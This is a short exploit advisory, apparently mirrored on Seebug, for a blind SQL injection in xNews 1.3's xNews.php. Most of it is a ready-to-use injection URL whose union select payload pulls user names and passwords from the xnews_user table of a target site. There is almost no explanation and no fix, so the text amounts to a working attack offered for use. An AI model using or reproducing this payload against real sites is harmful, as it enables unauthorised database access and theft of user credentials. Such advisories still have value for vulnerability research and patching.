******************************************************************************* # Title : xNews 1.3 (xNews.php) Remote Blind SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.x-dev.de # $$ : Free ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//xNews.php?act=shownews&id=[SQL] Example: //xNews.php?act=shownews&id=-1/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/xnews_user/**/where/**/id%20like%201/* [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论